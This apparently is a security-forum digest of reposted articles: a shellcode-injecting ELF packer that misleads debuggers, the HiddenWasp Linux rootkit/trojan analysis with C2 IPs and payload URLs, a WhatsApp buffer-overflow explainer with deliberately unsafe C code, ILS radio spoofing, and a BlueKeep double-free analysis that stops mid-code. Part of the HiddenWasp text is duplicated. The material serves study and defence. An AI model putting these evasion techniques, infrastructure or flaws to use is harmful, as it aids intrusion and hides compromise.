Debuggers don't generally like 0 as the entrypoint, and oftentimes it is impossible to set breakpoints in the header area. Another issue that often occurs is that the entry0 label gets set incorrectly to the main label, which means the attacker can purposely mislead the reverse engineer into reverse engineering fake code by jumping over the main method. Executing db entry0 in radare2 exhibits this behaviour.

Affected debuggers

radare2
Hopper
gdb
IDA Pro --> Not tested

0pack help

Injects shellcode as relocations into an ELF binary
Usage:
  0pack [OPTION...]

  -d, --debug            Enable debugging
  -i, --input arg        Input file path. Required.
  -p, --payload arg      Fasm payload path.
  -b, --bin_payload arg  Binary payload path.
  -o, --output arg       Output file path. Required.
  -s, --strip            Strip the binary. Optional.

-b, --bin_payload

The bin_payload option reads a binary file and converts it to ELF relocations. 0pack appends to the binary payload a jmp to the original entrypoint.

-p, --payload

Needs a fasm payload; 0pack prepends and appends a "push/pop all registers" sequence and a jmp to the original entrypoint to the payload.

Remarks

Although I used the LIEF library to accomplish this task, I wouldn't encourage using it. It is very inconsistent and opaque about what it is doing. At times the library is downright broken. I did not find a working library for x64 PIE-enabled ELF binaries. If someone has suggestions, feel free to email me at: luis.nixos@gmail.com

Dependencies

cmake version 3.12.2 or higher
build-essential
gcc
fasm

Use build script

$ ./build.sh

Build it manually

$ mkdir build
$ cd build
$ cmake ..
$ make
$ ./../main.elf

Sursa: https://github.com/Luis-Hebendanz/0pack
  12. HiddenWasp Malware Stings Targeted Linux Systems

Ignacio Sanmillan, 29.05.19

Overview

• Intezer has discovered a new, sophisticated malware that we have named "HiddenWasp", targeting Linux systems.
• The malware is still active and has a zero-detection rate in all major anti-virus systems.
• Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.
• Evidence shows with high probability that the malware is used in targeted attacks on victims who are already under the attacker's control, or who have gone through heavy reconnaissance.
• HiddenWasp's authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families; however, the attribution is made with low confidence.
• We have detailed our recommendations for preventing and responding to this threat.

1. Introduction

Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild. Unlike Windows malware, authors of Linux malware do not seem to invest much effort in writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers. In addition, anti-virus solutions for Linux tend not to be as resilient as on other platforms. Therefore, threat actors targeting Linux systems are less concerned with implementing excessive evasion techniques: even when reusing extensive amounts of code, threats can manage to stay relatively under the radar.

Nevertheless, malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers. We believe this fact is alarming for the security community, since many implants today have very low detection rates, making these threats difficult to detect and respond to.

We have discovered further undetected Linux malware that appears to enforce advanced evasion techniques, using rootkits to leverage trojan-based implants. In this blog we will present a technical analysis of each of the different components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed to several open-source malware projects. The following images are screenshots from VirusTotal of the newer undetected malware samples discovered:

2. Technical Analysis

When we came across these samples we noticed that the majority of their code was unique: Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another.

2.1 Initial Deployment Script:

When we spotted these undetected files in VirusTotal, it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary. We observed that these files were uploaded to VirusTotal using a path containing the name of a China-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd.
Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong. Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes: Thanks to this file we were able to download further artifacts not present in VirusTotal related to this campaign. This script will start by defining a set of variables that would be used throughout the script. Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system: Furthermore, after the system’s user account has been created, the script proceeds to clean the system as a means to update older variants if the system was already compromised: The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script: After malware components have been installed, the script will then proceed to execute the trojan: We can see that the main trojan binary is executed, the rootkit is added to LD_PRELOAD path and another series of environment variables are set such as the ‘I_AM_HIDDEN’. We will cover throughout this post what the role of this environment variable is. To finalize, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local. Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly. The deployment script has interesting insights of further features that the malware implements, such as the introduction of a new environment variable ‘HIDE_THIS_SHELL’: We found some of the environment variables used in a open-source rootkit known as Azazel. It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN. We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. The majority of the code from the rootkit implants involved in this malware infrastructure are noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project. 2.2 The Rootkit: The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism. It is delivered in the form of an ET_DYN stripped ELF binary. This shared object has an DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object gets loaded by a given process: Within this function we can see that eventually control flow falls into a function in charge to resolve a set of dynamic imports, which are the functions it will later hook, alongside with decoding a series of strings needed for the rootkit operations. We can see that for each string it allocates a new dynamic buffer, it copies the string to it to then decode it. 
It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit. When we wrote the script to simulate the cipher that implements the string decoding function we observed the following algorithm: We recognized that a similar algorithm to the one above was used in the past by Mirai, implying that authors behind this rootkit may have ported and modified some code from Mirai. After the rootkit main object has been loaded into the address space of a given process and has decrypted its strings, it will export the functions that are intended to be hooked. We can see these exports to be the following: For every given export, the rootkit will hook and implement a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it is checked whether the environment variable ‘I_AM_HIDDEN’ is set: We can see an example of how the rootkit hooks the function fopen in the following screenshot: We have observed that after checking whether the ‘I_AM_HIDDEN’ environment variable is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, specifically to the fopen function it will also check whether the file to open is ‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by scanning every entry for the destination or source ports used to communicate with the cnc, in this case 61061. This is also the default port in Azazel rootkit. The rootkit primarily implements artifact hiding mechanisms as well as tcp connection hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in the following diagram: 2.3 The Trojan: The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to some common MD5 implementation in one of the statically linked libraries it was linked with: In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared in Chinese hacking forums: When we analyze the main we noticed that the first action the trojan takes is to retrieve its configuration: The malware configuration is appended at the end of the file and has the following structure: The malware will try to load itself from the disk and parse this blob to then retrieve the static encrypted configuration. Once encryption configuration has been successfully retrieved the configuration will be decoded and then parsed as json. The cipher used to encode and decode the configuration is the following: This cipher seems to be an RC4 alike algorithm with an already computed PRGA generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs. After the configuration is decoded the following json will be retrieved: Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker’s LD_PRELOAD path. This location is usually at /etc/ld.so.preload, however there is always a possibility to patch the dynamic linker binary to change this path: Patch_ld function will scan for any existent /lib paths. 
The rootkit primarily implements artifact hiding mechanisms, as well as TCP connection hiding as previously mentioned. The overall functionality of the rootkit can be illustrated in the following diagram.

2.3 The Trojan:

The trojan comes in the form of a statically linked ELF binary, linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ's Elknot implant with regard to a common MD5 implementation in one of the libraries it was statically linked with. In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that the actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared on Chinese hacking forums.

When we analyzed the main function, we noticed that the first action the trojan takes is to retrieve its configuration. The malware configuration is appended at the end of the file and has the following structure. The malware will try to load itself from disk and parse this blob to retrieve the static encrypted configuration. Once the encrypted configuration has been successfully retrieved, it will be decoded and then parsed as JSON. The cipher used to encode and decode the configuration seems to be an RC4-like algorithm with an already-computed, PRGA-generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs. After the configuration is decoded, the following JSON will be retrieved.

Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker's preload path. This location is usually /etc/ld.so.preload; however, it is always possible to patch the dynamic linker binary to change this path. The Patch_ld function will scan any existing /lib paths; the scanned paths are the following. The malware will attempt to find the dynamic linker binary within these paths (the dynamic linker filename is usually prefixed with ld-<version number>). Once the dynamic linker is located, the malware finds the offset of the /etc/ld.so.preload string within the binary and overwrites it with the new target preload path, that being /sbin/.ifup-local. To achieve this patching it executes the following formatted string using the xxd hex editor utility, having previously encoded the path of the rootkit in hex.

Once it has changed the dynamic linker's default preload path, it deploys a thread to enforce that the rootkit is successfully installed using the new preload path. In addition, the trojan communicates with the rootkit via the environment variable 'I_AM_HIDDEN' to mark the trojan's own session, so that the rootkit can apply evasion mechanisms to all other sessions. Having seen the rootkit's functionality, we can understand that the rootkit and trojan work together to help each other remain persistent in the system: the rootkit attempts to hide the trojan, and the trojan enforces that the rootkit remains operational. The following diagram illustrates this relationship.

Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts. These artifacts are the following. By performing some OSINT on these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng, hosted on GitHub. The fact that these artifacts are searched for suggests that the Linux systems targeted by these implants may already have been compromised with some variant of this open-source rootkit as an additional artifact in this malware's infrastructure. Although those paths are searched for in order to hide their presence in the system, it is important to note that none of the analyzed artifacts related to this malware are installed in such paths. This finding may imply that the systems this malware aims to intrude are already-known compromised targets of the same group, or of a third party collaborating toward the same end goal in this particular campaign.

Moreover, the trojan communicates over a simple network protocol on top of TCP. We can see that when a connection is established to the Master or Stand-By servers, a handshake mechanism is involved in order to identify the client. With the help of this function we were able to understand the structure of the communication protocol employed, and we can illustrate it by looking at a pcap of the initial handshake between the server and client. We noticed while analyzing this protocol that the Reserved and Method fields are always constant, those being 0 and 1 respectively. The cipher table offset represents the offset into the hardcoded key-stream with which the encrypted payload was encoded. The following is the fixed keystream this field references. After decrypting the traffic and analyzing some of the trojan's network-related functions, we noticed that the communication protocol is also implemented in JSON format.
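Based on that description, the decryption step can be sketched as an XOR of the payload against the hardcoded key-stream table, starting at the offset named in the packet header. The table contents and size below are placeholders, not the implant's actual bytes.

#include <stddef.h>
#include <stdint.h>

/* Placeholder table: the implant embeds a fixed, precomputed PRGA
 * key-stream; only its role matters here, not these byte values. */
static const uint8_t keystream[1024] = { 0x13, 0x37 /* ... */ };

/* RC4-like en/decode: since the PRGA output is precomputed, both
 * directions reduce to an XOR against the table, starting at the
 * "cipher table offset" carried in each packet. */
static void ks_crypt(uint8_t *buf, size_t len, size_t table_offset)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= keystream[(table_offset + i) % sizeof(keystream)];
}

Because the same routine protects both the appended configuration and the C&C traffic, extracting the table from the binary once is enough to decode both (the wrap-around via the modulo is our assumption about how the offset is consumed).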
The following image shows the decrypted handshake packets between the CNC and the trojan, confirming the JSON format. After the handshake is completed, the trojan proceeds to handle CNC requests, performing different operations depending on the given request. An overview of the trojan's functionality as performed by the request handling is shown below.

3. Prevention and Response

Prevention: Block the Command-and-Control IP addresses detailed in the IOCs section.

Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to detect these implants. In addition, to check whether your system is infected, you can search for "ld.so" files; if any of them does not contain the string '/etc/ld.so.preload', your system may be compromised. This is because the trojan implant patches instances of ld.so in order to enforce the LD_PRELOAD mechanism from an arbitrary location.
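One way to implement that check is to scan each ld-*.so binary on disk for the expected string and flag any copy that lacks it. A minimal sketch follows; the linker path is illustrative and distribution-specific.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return 1 if `needle` occurs in the file at `path`, 0 if not, -1 on error. */
static int file_contains(const char *path, const char *needle)
{
    FILE *f = fopen(path, "rb");
    if (!f)
        return -1;
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    rewind(f);

    char *data = malloc(size > 0 ? (size_t)size : 1);
    if (!data || fread(data, 1, (size_t)size, f) != (size_t)size) {
        free(data);
        fclose(f);
        return -1;
    }
    fclose(f);

    int found = memmem(data, (size_t)size, needle, strlen(needle)) != NULL;
    free(data);
    return found;
}

int main(void)
{
    /* Adjust to the ld-*.so path present on your distribution. */
    const char *ld = "/lib/x86_64-linux-gnu/ld-2.24.so";

    if (file_contains(ld, "/etc/ld.so.preload") == 0)
        printf("WARNING: %s does not reference /etc/ld.so.preload - possibly patched\n", ld);
    else
        printf("%s looks intact (or could not be read)\n", ld);
    return 0;
}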
4. Summary

We analyzed every component of HiddenWasp, explaining how the rootkit and trojan implants work in parallel with each other in order to enforce persistence in the system. We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected.

Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake-up call for the security industry to allocate greater efforts or resources to detect these threats. Linux malware will continue to become more complex over time; currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.

IOCs
103.206.123[.]13
103.206.122[.]245
http://103.206.123[.]13:8080/system.tar.gz
http://103.206.123[.]13:8080/configUpdate.tar.gz
http://103.206.123[.]13:8080/configUpdate-32.tar.gz
e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3
f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d
d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b
0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8
2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0
d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0
609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578
8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d
f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2
8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b

By Ignacio Sanmillan
Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducted projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format.

Sursa: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
13. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw

WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself.

WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world's most popular messaging app, with 1.5 billion monthly users from 180 countries, and has always prided itself on being secure. Below, we'll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability.

First, what's up with WhatsApp security?

WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance, due to the company's early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal messaging protocol deployed by WhatsApp. We suspect that the company's security eminence and focus on baking in privacy come from the strong security mindset of WhatsApp founder Jan Koum, who grew up as a hacker in the w00w00 hacker clan in the 1990s.

But WhatsApp was then used for … surveillance?

WhatsApp's reputation as a secure messaging app and its popularity amongst activists made the report of a third-party company stealthily offering turn-key targeted surveillance against WhatsApp's Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli firm NSO Group, is likely an offshoot of Unit 8200, which was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program. It has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and for allegedly aiding the Saudi regime in spying on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO.

The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case.

So what went wrong?

Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that a chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting their target's communications if they can instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages. According to a brief security advisory issued by Facebook, the attack against WhatsApp exploited a previously unknown (0-day) vulnerability in the mobile app.
A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what's called a buffer overflow memory corruption vulnerability, due to insufficient checking of data lengths.

I've heard the term buffer overflow. But I don't really know what it is.

To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let's imagine this memory as a vast row of labeled boxes, numbered sequentially from 0.

Suppose some program, through dynamic memory allocation, opts to store the name of the current user ("mom") as the three characters "m", "o" and "m" in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards. A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of "mom" inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in "mommy". The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there.

But how does this relate to security?

Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004, with the control flow of the program always impacted, then it's highly likely that the programmer has already discovered their mistake when testing the program -- the program is bound to fail each time, after all. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have slipped past testing and persisted in the code base.

Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for figuring out how the program should continue to run. The formal way of saying this is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function.) Suddenly, the path of the program's execution can be influenced by the user. It's like you could tell somebody else's program, "Hey, you should do X, Y and Z", and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do?

I would … tell the program to … take over the computer?

You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running.
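To make the boxes example concrete, here is a deliberately contrived sketch (ours, not WhatsApp's code) in which an unchecked copy into a fixed-size buffer clobbers a function pointer that happens to live right next to it:

#include <stdio.h>
#include <string.h>

static void greet_user(void) { puts("hello, user"); }

struct session {
    char name[8];            /* boxes 17000..17007, so to speak     */
    void (*on_login)(void);  /* boxes 17008..17015, right next door */
};

int main(void)
{
    struct session s;
    s.on_login = greet_user;

    /* BUG: no length check -- the same class of flaw described above.
     * 15 characters + NUL = 16 bytes, filling name[] and then spilling
     * over the adjacent function pointer. */
    const char *attacker_controlled = "mommymommymommy";
    strcpy(s.name, attacker_controlled);

    s.on_login();  /* control flow now depends on attacker-chosen bytes */
    return 0;
}

On a typical 64-bit build this crashes at an address assembled out of the attacker's "m"/"o"/"y" bytes; a real attacker would instead plant the address of something useful there, which is exactly the control-flow hijack described above.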
Crafting that payload is the art of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?).

Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code: both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string "mommy", that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers: first hypothetically in 1972, then practically by Robert T. Morris's Morris worm, launched from MIT, that swept the internet in 1988, and by Aleph One's 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack.

The second idea, which was crystalized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions that are already contained within the program, in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers, without the author needing to provide any handwriting. Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state of the art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018.

Ahh… but what happened with WhatsApp?

What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code of the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information about how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transport Protocol). (Image credit: CheckPoint Research) The odd choices of variable names and structure are artifacts of the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response to signal a picture loss (PLI) (code is illustrative):

int length_argument = /* from incoming RTCP packet */;

qmemcpy(&outgoing_rtcp_payload[offset],
        incoming_rtcp_packet,
        length_argument);

/* Continue building RTCP PLI packet and send */

But if the remaining size of the payload buffer (after offset) is less than length_argument, a number supplied by the hacker, information from the incoming packet will be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload! Just like in the buffer overflow situation before, the overwritten data could include data that later directs the control flow of the program, like an overwritten function pointer.

In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user.
As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frames so that the lengths in the incoming packet cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running.

Try it yourself?

Buffer overflows are technical flaws that build on an understanding of how computers execute code. Given how prevalent and how important they are, as illustrated by the WhatsApp attack, we believe we should all better understand how such bugs are exploited, to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence.

Do you like this kind of thing? Go read about how Facebook got hacked last year and try out hacking it yourself. Learn more about our security training platform for developers at adversary.io

Sursa: https://blog.adversary.io/whatsapp-hack/
14. Wireless Attacks on Aircraft Instrument Landing Systems

Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir
Khoury College of Computer Sciences, Northeastern University, Boston, MA, USA

Abstract
Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers have demonstrated vulnerabilities in many of these aviation systems. However, the resilience of aircraft landing systems to adversarial wireless attacks has not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commercially available SDRs, causing last-minute go-around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine grain control the course deviation indicator as displayed by the ILS receiver, in real time. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary's transmitted signals as a function of the aircraft's GPS location, maintaining power and deviation consistent with the adversary's target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA-certified flight simulator's (X-Plane) AI-based autoland feature, and demonstrate a systematic success rate with offset touchdowns of 18 meters to over 50 meters.

Download: https://aanjhan.com/assets/ils_usenix2019.pdf
15. Analysis of CVE-2019-0708 (BlueKeep)
By MalwareTech, May 31, 2019

I held back this write-up until a proof of concept (PoC) was publicly available, so as not to cause any harm. Now that there are multiple denial-of-service PoCs on GitHub, I'm posting my analysis.

Binary Diffing
As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results.

A BinDiff of TermDD.sys pre and post patch.

Most of the changes turned out to be pretty mundane, except for "_IcaBindVirtualChannels" and "_IcaRebindVirtualChannels". Both functions contained the same change, so I focused on the former, as binding would likely occur before rebinding.

Original IcaBindVirtualChannels is on the left, the patched version is on the right.

New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to "MS_T120", then parameter three of _IcaBindChannel is set to 31. Based on the fact that the change only takes place if v4+88 is "MS_T120", we can assume that to trigger the bug this condition must be true. So, my first question was: what is "v4+88"? Looking at the logic inside IcaFindChannelByName, I quickly found my answer.

Inside of IcaFindChannelByName

Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel by its name. The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure. Using all of the above, I came to the conclusion that "MS_T120" is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120.

I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspected the channel name and call stack.

The call stack and channel name upon the first call to IcaBindVirtualChannels

The very first call to IcaBindVirtualChannels is for the channel I want, MS_T120. The subsequent channel names are "CTXTW", "rdpdr", "rdpsnd", and "drdynvc". Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, I'd need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name. So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. I just needed to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight.

A capture of the RDP connection sequence

The channel array, as seen by Wireshark's RDP parser

The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing are MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need. Seeing as MS_T120 and CTXTW are not specified anywhere, but are opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels.
After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test.

Breakpoint hit after adding MS_T120 to the channel array

Awesome! Now that the vulnerable code path is hit, I just need to figure out what can be done… To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection.

The call stack when the IcaCreateChannel breakpoint is hit

Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that's not of interest. Below it is the ICAAPI, which is the user-mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user-mode equivalent of IcaCreateChannel. Due to the fact that IcaOpenChannel is a generic function used for opening all channels, we'll go down another level, to rdpwsx!MCSCreateDomain.

The code for rdpwsx!MCSCreateDomain

This function is really promising for a couple of reasons. Firstly, it calls IcaChannelOpen with the hardcoded name "MS_T120". Secondly, it creates an IoCompletionPort with the returned channel handle (completion ports are used for asynchronous I/O). The variable named "CompletionPort" is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port.

All references to "CompletionPort"

Well, MCSInitialize is probably a good place to start; initialization code always is.

The code contained within MCSInitialize

Ok, so a thread is created for the completion port, with the entry point IoThreadFunc. Let's look there.

The completion port message handler

GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it's passed to MCSPortData. To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string "MalwareTech" to the channel.

Breakpoint hit on MCSPortData once data is sent to the channel.

So that confirms it: I can read/write to the MS_T120 channel. Now, let's look at what MCSPortData does with the channel data…

MCSPortData buffer handling code

ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function, a check is performed on channel_ptr+120 (offset 4 into the data buffer). If the dword there is set to 2, the function calls HandleDisconnectProviderIndication and MCSCloseChannel. Well, that's interesting. The code looks like some kind of handler for channel connect/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally. I don't think we're supposed to be here…

Being a little curious, I sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn't lead to any issues, could it? Oh, no. We crashed the kernel! Whoops!

Let's take a look at the bugcheck to get a better idea of what happened. It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I'd already closed (leading to a double free). Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit.
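As a tiny user-mode analogue of what just happened (a sketch, not the kernel code): two owners each hold a reference to the same allocation, and each believes it must free it. The second free corrupts the allocator's state, and the kernel-mode equivalent bugchecks just like TermDD did.

#include <stdlib.h>
#include <string.h>

struct channel { char name[16]; };

int main(void)
{
    struct channel *ch = malloc(sizeof(*ch));
    if (!ch)
        return 1;
    strcpy(ch->name, "MS_T120");

    struct channel *ref1 = ch;  /* reference held by our crafted bind  */
    struct channel *ref2 = ch;  /* reference held by the system itself */

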